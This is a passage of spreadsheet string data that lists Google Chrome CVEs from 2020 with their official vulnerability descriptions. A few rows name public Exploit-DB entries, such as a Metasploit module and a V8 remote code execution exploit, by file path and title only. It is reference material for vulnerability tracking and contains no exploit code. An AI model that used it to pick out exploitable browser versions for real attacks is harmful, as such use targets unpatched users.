    <t>Use after free in audio in Google Chrome prior to 79.0.3945.117 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6378</t>
  </si>
  <si>
    <t>Use after free in speech in Google Chrome prior to 79.0.3945.130 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6379</t>
  </si>
  <si>
    <t>Use after free in V8 in Google Chrome prior to 79.0.3945.130 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6380</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in extensions in Google Chrome prior to 79.0.3945.130 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6381</t>
  </si>
  <si>
    <t>Integer overflow in JavaScript in Google Chrome on ChromeOS and Android prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6382</t>
  </si>
  <si>
    <t>Type confusion in JavaScript in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6383</t>
  </si>
  <si>
    <t>Type confusion in V8 in Google Chrome prior to 80.0.3987.116 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6384</t>
  </si>
  <si>
    <t>Use after free in WebAudio in Google Chrome prior to 80.0.3987.116 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6385</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in storage in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to bypass site isolation via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6386</t>
  </si>
  <si>
    <t>Use after free in speech in Google Chrome prior to 80.0.3987.116 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6387</t>
  </si>
  <si>
    <t>Out of bounds write in WebRTC in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted video stream.</t>
  </si>
  <si>
    <t>CVE-2020-6388</t>
  </si>
  <si>
    <t>Out of bounds access in WebAudio in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6389</t>
  </si>
  <si>
    <t>CVE-2020-6390</t>
  </si>
  <si>
    <t>Out of bounds memory access in streams in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6391</t>
  </si>
  <si>
    <t>Insufficient validation of untrusted input in Blink in Google Chrome prior to 80.0.3987.87 allowed a local attacker to bypass content security policy via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6392</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in extensions in Google Chrome prior to 80.0.3987.87 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6393</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in Blink in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6394</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in Blink in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to bypass content security policy via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6395</t>
  </si>
  <si>
    <t>Out of bounds read in JavaScript in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6396</t>
  </si>
  <si>
    <t>Inappropriate implementation in Skia in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6397</t>
  </si>
  <si>
    <t>Inappropriate implementation in sharing in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to spoof security UI via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6398</t>
  </si>
  <si>
    <t>Use of uninitialized data in PDFium in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file.</t>
  </si>
  <si>
    <t>CVE-2020-6399</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in AppCache in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6400</t>
  </si>
  <si>
    <t>Inappropriate implementation in CORS in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6401</t>
  </si>
  <si>
    <t>Insufficient validation of untrusted input in Omnibox in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name.</t>
  </si>
  <si>
    <t>CVE-2020-6402</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in downloads in Google Chrome on OS X prior to 80.0.3987.87 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6403</t>
  </si>
  <si>
    <t>Incorrect implementation in Omnibox in Google Chrome on iOS prior to 80.0.3987.87 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6404</t>
  </si>
  <si>
    <t>Inappropriate implementation in Blink in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6405</t>
  </si>
  <si>
    <t>Out of bounds read in SQLite in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6406</t>
  </si>
  <si>
    <t>Use after free in audio in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6407</t>
  </si>
  <si>
    <t>Out of bounds memory access in streams in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6408</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in CORS in Google Chrome prior to 80.0.3987.87 allowed a local attacker to obtain potentially sensitive information via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6409</t>
  </si>
  <si>
    <t>Inappropriate implementation in Omnibox in Google Chrome prior to 80.0.3987.87 allowed a remote attacker who convinced the user to enter a URI to bypass navigation restrictions via a crafted domain name.</t>
  </si>
  <si>
    <t>CVE-2020-6410</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in navigation in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to confuse the user via a crafted domain name.</t>
  </si>
  <si>
    <t>CVE-2020-6411</t>
  </si>
  <si>
    <t>CVE-2020-6412</t>
  </si>
  <si>
    <t>CVE-2020-6413</t>
  </si>
  <si>
    <t>Inappropriate implementation in Blink in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to bypass HTML validators via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6414</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in Safe Browsing in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6415</t>
  </si>
  <si>
    <t>Inappropriate implementation in JavaScript in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6416</t>
  </si>
  <si>
    <t>Insufficient data validation in streams in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6417</t>
  </si>
  <si>
    <t>Inappropriate implementation in installer in Google Chrome prior to 80.0.3987.87 allowed a local attacker to execute arbitrary code via a crafted registry entry.</t>
  </si>
  <si>
    <t>CVE-2020-6418</t>
  </si>
  <si>
    <t>Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>exploits/multiple/remote/48186.rb</t>
  </si>
  <si>
    <t>Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)</t>
  </si>
  <si>
    <t>CVE-2020-6419</t>
  </si>
  <si>
    <t>Out of bounds write in V8 in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6420</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in media in Google Chrome prior to 80.0.3987.132 allowed a remote attacker to bypass same origin policy via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6422</t>
  </si>
  <si>
    <t>Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6423</t>
  </si>
  <si>
    <t>Use after free in audio in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6424</t>
  </si>
  <si>
    <t>Use after free in media in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6425</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in extensions in Google Chrome prior to 80.0.3987.149 allowed an attacker who convinced a user to install a malicious extension to bypass site isolation via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6426</t>
  </si>
  <si>
    <t>Inappropriate implementation in V8 in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6427</t>
  </si>
  <si>
    <t>Use after free in audio in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6428</t>
  </si>
  <si>
    <t>CVE-2020-6429</t>
  </si>
  <si>
    <t>CVE-2020-6430</t>
  </si>
  <si>
    <t>Type Confusion in V8 in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6431</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in full screen in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to spoof security UI via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6432</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in navigations in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6433</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in extensions in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6434</t>
  </si>
  <si>
    <t>Use after free in devtools in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6435</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in extensions in Google Chrome prior to 81.0.4044.92 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6436</t>
  </si>
  <si>
    <t>Use after free in window management in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6437</t>
  </si>
  <si>
    <t>Inappropriate implementation in WebView in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to spoof security UI via a crafted application.</t>
  </si>
  <si>
    <t>CVE-2020-6438</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in extensions in Google Chrome prior to 81.0.4044.92 allowed an attacker who convinced a user to install a malicious extension to obtain potentially sensitive information from process memory via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6439</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in navigations in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to bypass security UI via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6440</t>
  </si>
  <si>
    <t>Inappropriate implementation in extensions in Google Chrome prior to 81.0.4044.92 allowed an attacker who convinced a user to install a malicious extension to obtain potentially sensitive information via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6441</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in omnibox in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to bypass security UI via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6442</t>
  </si>
  <si>
    <t>Inappropriate implementation in cache in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6443</t>
  </si>
  <si>
    <t>Insufficient data validation in developer tools in Google Chrome prior to 81.0.4044.92 allowed a remote attacker who had convinced the user to use devtools to execute arbitrary code via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6444</t>
  </si>
  <si>
    <t>Uninitialized use in WebRTC in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6445</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in trusted types in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to bypass content security policy via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6446</t>
  </si>
  <si>
    <t>CVE-2020-6447</t>
  </si>
  <si>
    <t>Inappropriate implementation in developer tools in Google Chrome prior to 81.0.4044.92 allowed a remote attacker who had convinced the user to use devtools to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6448</t>
  </si>
  <si>
    <t>Use after free in V8 in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6449</t>
  </si>
  <si>
    <t>CVE-2020-6450</t>
  </si>
  <si>
    <t>Use after free in WebAudio in Google Chrome prior to 80.0.3987.162 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6451</t>
  </si>
  <si>
    <t>CVE-2020-6452</t>
  </si>
  <si>
    <t>Heap buffer overflow in media in Google Chrome prior to 80.0.3987.162 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6453</t>
  </si>
  <si>
    <t>Inappropriate implementation in V8 in Google Chrome prior to 80.0.3987.162 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6454</t>
  </si>
  <si>
    <t>Use after free in extensions in Google Chrome prior to 81.0.4044.92 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6455</t>
  </si>
  <si>
    <t>Out of bounds read in WebSQL in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6456</t>
  </si>
  <si>
    <t>Insufficient validation of untrusted input in clipboard in Google Chrome prior to 81.0.4044.92 allowed a local attacker to bypass site isolation via crafted clipboard contents.</t>
  </si>
  <si>
    <t>CVE-2020-6457</t>
  </si>
  <si>
    <t>Use after free in speech recognizer in Google Chrome prior to 81.0.4044.113 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6458</t>
  </si>
  <si>
    <t>Out of bounds read and write in PDFium in Google Chrome prior to 81.0.4044.122 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file.</t>
  </si>
  <si>
    <t>CVE-2020-6459</t>
  </si>
  <si>
    <t>Use after free in payments in Google Chrome prior to 81.0.4044.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6460</t>
  </si>
  <si>
    <t>Insufficient data validation in URL formatting in Google Chrome prior to 81.0.4044.122 allowed a remote attacker to perform domain spoofing via a crafted domain name.</t>
  </si>
  <si>
    <t>CVE-2020-6461</t>
  </si>
  <si>
    <t>Use after free in storage in Google Chrome prior to 81.0.4044.129 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6462</t>
  </si>
  <si>
    <t>Use after free in task scheduling in Google Chrome prior to 81.0.4044.129 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6463</t>
  </si>
  <si>
    <t>Use after free in ANGLE in Google Chrome prior to 81.0.4044.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6464</t>
  </si>
  <si>
    <t>Type confusion in Blink in Google Chrome prior to 81.0.4044.138 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6465</t>
  </si>
  <si>
    <t>Use after free in reader mode in Google Chrome on Android prior to 83.0.4103.61 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6466</t>
  </si>
  <si>
    <t>Use after free in media in Google Chrome prior to 83.0.4103.61 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6467</t>
  </si>
  <si>
    <t>Use after free in WebRTC in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6468</t>
  </si>
  <si>
    <t>Type confusion in V8 in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6469</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in developer tools in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6470</t>
  </si>
  <si>
    <t>Insufficient validation of untrusted input in clipboard in Google Chrome prior to 83.0.4103.61 allowed a local attacker to inject arbitrary scripts or HTML (UXSS) via crafted clipboard contents.</t>
  </si>
  <si>
    <t>CVE-2020-6471</t>
  </si>
  <si>
    <t>CVE-2020-6472</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in developer tools in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to obtain potentially sensitive information from process memory or disk via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6473</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in Blink in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6474</t>
  </si>
  <si>
    <t>Use after free in Blink in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6475</t>
  </si>
  <si>
    <t>Incorrect implementation in full screen in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to spoof security UI via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6476</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in tab strip in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6477</t>
  </si>
  <si>
    <t>Inappropriate implementation in installer in Google Chrome on OS X prior to 83.0.4103.61 allowed a local attacker to perform privilege escalation via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-6478</t>
  </si>
  <si>
    <t>Inappropriate implementation in full screen in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to spoof security UI via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6479</t>
  </si>
  <si>
    <t>Inappropriate implementation in sharing in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to spoof security UI via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6480</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in enterprise in Google Chrome prior to 83.0.4103.61 allowed a local attacker to bypass navigation restrictions via UI actions.</t>
  </si>
  <si>
    <t>CVE-2020-6481</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in URL formatting in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to perform domain spoofing via a crafted domain name.</t>
  </si>
  <si>
    <t>CVE-2020-6482</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in developer tools in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6483</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in payments in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6484</t>
  </si>
  <si>
    <t>Insufficient data validation in ChromeDriver in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to bypass navigation restrictions via a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-6485</t>
  </si>
  <si>
    <t>Insufficient data validation in media router in Google Chrome prior to 83.0.4103.61 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6486</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in navigations in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6487</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in downloads in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6488</t>
  </si>
  <si>
    <t>CVE-2020-6489</t>
  </si>
  <si>
    <t>Inappropriate implementation in developer tools in Google Chrome prior to 83.0.4103.61 allowed a remote attacker who had convinced the user to take certain actions in developer tools to obtain potentially sensitive information from disk via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6490</t>
  </si>
  <si>
    <t>Insufficient data validation in loader in Google Chrome prior to 83.0.4103.61 allowed a remote attacker who had been able to write to disk to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6491</t>
  </si>
  <si>
    <t>Insufficient data validation in site information in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to spoof security UI via a crafted domain name.</t>
  </si>
  <si>
    <t>CVE-2020-6492</t>
  </si>
  <si>
    <t>Use after free in ANGLE in Google Chrome prior to 83.0.4103.97 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6493</t>
  </si>
  <si>
    <t>Use after free in WebAuthentication in Google Chrome prior to 83.0.4103.97 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6494</t>
  </si>
  <si>
    <t>Incorrect security UI in payments in Google Chrome on Android prior to 83.0.4103.97 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6495</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in developer tools in Google Chrome prior to 83.0.4103.97 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6496</t>
  </si>
  <si>
    <t>Use after free in payments in Google Chrome on MacOS prior to 83.0.4103.97 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6497</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in Omnibox in Google Chrome on iOS prior to 83.0.4103.88 allowed a remote attacker to perform domain spoofing via a crafted URI.</t>
  </si>
  <si>
    <t>CVE-2020-6498</t>
  </si>
  <si>
    <t>Incorrect implementation in user interface in Google Chrome on iOS prior to 83.0.4103.88 allowed a remote attacker to perform domain spoofing via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6499</t>
  </si>
  <si>
    <t>Inappropriate implementation in AppCache in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to bypass AppCache security restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6500</t>
  </si>
  <si>
    <t>Inappropriate implementation in interstitials in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6501</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in CSP in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to bypass content security policy via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6502</t>
  </si>
  <si>
    <t>Incorrect implementation in permissions in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to spoof security UI via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6503</t>
  </si>
  <si>
    <t>Inappropriate implementation in accessibility in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6504</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in notifications in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to bypass notification restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6505</t>
  </si>
  <si>
    <t>Use after free in speech in Google Chrome prior to 83.0.4103.106 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6506</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in WebView in Google Chrome on Android prior to 83.0.4103.106 allowed a remote attacker to bypass site isolation via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6507</t>
  </si>
  <si>
    <t>Out of bounds write in V8 in Google Chrome prior to 83.0.4103.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>exploits/multiple/remote/49746.js</t>
  </si>
  <si>
    <t>Google Chrome 81.0.4044 V8 - Remote Code Execution</t>
  </si>
  <si>
    <t>2021-04-06</t>
  </si>
  <si>
    <t>CVE-2020-6509</t>
  </si>
  <si>
    <t>Use after free in extensions in Google Chrome prior to 83.0.4103.116 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6510</t>
  </si>
  <si>
    <t>Heap buffer overflow in background fetch in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6511</t>
  </si>
  <si>
    <t>Information leak in content security policy in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6512</t>
  </si>
  <si>
    <t>Type Confusion in V8 in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6513</t>
  </si>
  <si>
    <t>Heap buffer overflow in PDFium in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file.</t>
  </si>
  <si>
    <t>CVE-2020-6514</t>
  </si>
  <si>
    <t>Inappropriate implementation in WebRTC in Google Chrome prior to 84.0.4147.89 allowed an attacker in a privileged network position to potentially exploit heap corruption via a crafted SCTP stream.</t>
  </si>
  <si>
    <t>CVE-2020-6515</t>
  </si>
  <si>
    <t>Use after free in tab strip in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6516</t>
  </si>
  <si>
    <t>Policy bypass in CORS in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6517</t>
  </si>
  <si>
    <t>Heap buffer overflow in history in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6518</t>
  </si>
  <si>
    <t>Use after free in developer tools in Google Chrome prior to 84.0.4147.89 allowed a remote attacker who had convinced the user to use developer tools to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6519</t>
  </si>
  <si>
    <t>Policy bypass in CSP in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to bypass content security policy via a crafted HTML page.</t>
  </si>
  <si>
    <t>exploits/multiple/local/49195.js</t>
  </si>
  <si>
    <t>Chromium 83 - Full CSP Bypass</t>
  </si>
  <si>
    <t>CVE-2020-6520</t>
  </si>
